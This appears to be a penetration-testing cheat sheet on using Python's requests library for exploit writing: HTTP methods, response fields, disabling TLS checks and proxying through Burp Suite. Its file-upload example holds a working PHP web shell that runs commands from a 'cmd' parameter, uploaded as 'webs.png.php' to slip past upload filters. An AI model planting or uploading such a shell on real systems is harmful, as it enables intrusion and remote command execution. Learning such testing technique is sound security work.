Requests and proxy

During the exploit writing we will be mostly using the python requests library. Documentation: https://requests.readthedocs.io/en/latest/

Useful libraries

import requests

Disable display of certificate warnings

disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

Requests most common commands

Sending the requests

requests.delete(url, args)	            // Sends a DELETE request to the specified url
requests.get(url, params, args)	        // Sends a GET request to the specified url
requests.head(url, args)	            // Sends a HEAD request to the specified url
requests.patch(url, data, args)	        // Sends a PATCH request to the specified url
requests.post(url, data, json, args)	// Sends a POST request to the specified url
requests.put(url, data, args)	        // Sends a PUT request to the specified url

Reading the data

Verify = false is used for disabling the SSL/TLS check

// Storing the response
r = requests.get("https://www.google.com/", verify=False)

// Interesting parameters which we get in HTTP response object
r.status_code
r.headers
r.cookies
r.text

Sample file upload

files = {
    "file": ("webs.png.php", """<?php
// Simple PHP Webshell - Authorized Penetration Testing Use Only
if (isset($_GET['cmd'])) {
    $cmd = $_GET['cmd'];
    echo "<pre>" . shell_exec($cmd) . "</pre>";
}
?>""", "text/php"),
    "upload": (None, "Upload File")
}

Is equal to

Content-Type: multipart/form-data; boundary=29a0184a5959b6fee87e07e4de24f68a

--29a0184a5959b6fee87e07e4de24f68a
Content-Disposition: form-data; name="file"; filename="webs.png.php"
Content-Type: text/php

<?php
// Simple PHP Webshell - Authorized Penetration Testing Use Only
if (isset($_GET['cmd'])) {
    $cmd = $_GET['cmd'];
    echo "<pre>" . shell_exec($cmd) . "</pre>";
}
?>
--29a0184a5959b6fee87e07e4de24f68a
Content-Disposition: form-data; name="upload"

Upload File
--29a0184a5959b6fee87e07e4de24f68a--

Proxy traffic through Burp Suite

If you want to see and analyze the request from exploit you can forward it to Burp Suite by adding proxy to requests in the following way:

proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}

r = requests.get("https://www.google.com/", proxies=proxies, verify=False)